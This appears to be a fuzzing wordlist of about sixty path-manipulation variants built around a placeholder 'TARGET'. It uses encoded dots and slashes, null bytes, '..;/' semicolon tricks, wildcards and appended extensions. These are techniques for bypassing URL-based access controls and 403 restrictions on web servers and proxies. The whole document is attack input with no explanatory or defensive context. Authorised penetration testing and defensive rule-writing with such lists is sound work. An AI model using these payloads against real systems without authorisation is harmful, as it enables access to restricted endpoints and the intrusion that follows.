TARGET/
TARGET/%20
TARGET/%00
TARGET%20
TARGET%00
TARGET.json
TARGET.html
TARGET.htm
TARGET.php
TARGET.asp
TARGET.jsp
TARGET/.
TARGET/./
TARGET/%2e
TARGET/%2e/
TARGET/%2e%2f
TARGET//
TARGET/%2f
TARGET/x/..
TARGET/x/../
TARGET/x/%2e%2e/
TARGET/x/%2e%2e%2f
TARGET..
TARGET../
TARGET%2e%2e
TARGET%2e%2e/
TARGET%2e%2e%2f
TARGET..;/
TARGET..%3b/
TARGET%2e%2e%3b/
TARGET%2e%2e%3b%2f
TARGET/..;/
TARGET/..%3b/
TARGET/%2e%2e%3b/
TARGET/%2e%2e%3b%2f
TARGET/*
TARGET*
TARGET/%2a
TARGET/?x
TARGET?x
TARGET/?x=x
TARGET/#x
TARGET#x
./TARGET
.//TARGET
%2e//TARGET
%2e/TARGET
/TARGET
%2fTARGET
x/../TARGET
x//../TARGET
x/..//TARGET
x/%2e%2e/TARGET
x//%2e%2e/TARGET
x/%2e%2e//TARGET
x/%2e%2e%2fTARGET
..;/TARGET
..%3b/TARGET
%2e%2e%3b/TARGET
%2e%2e%3b%2f/TARGET
*/TARGET
%2a/TARGET
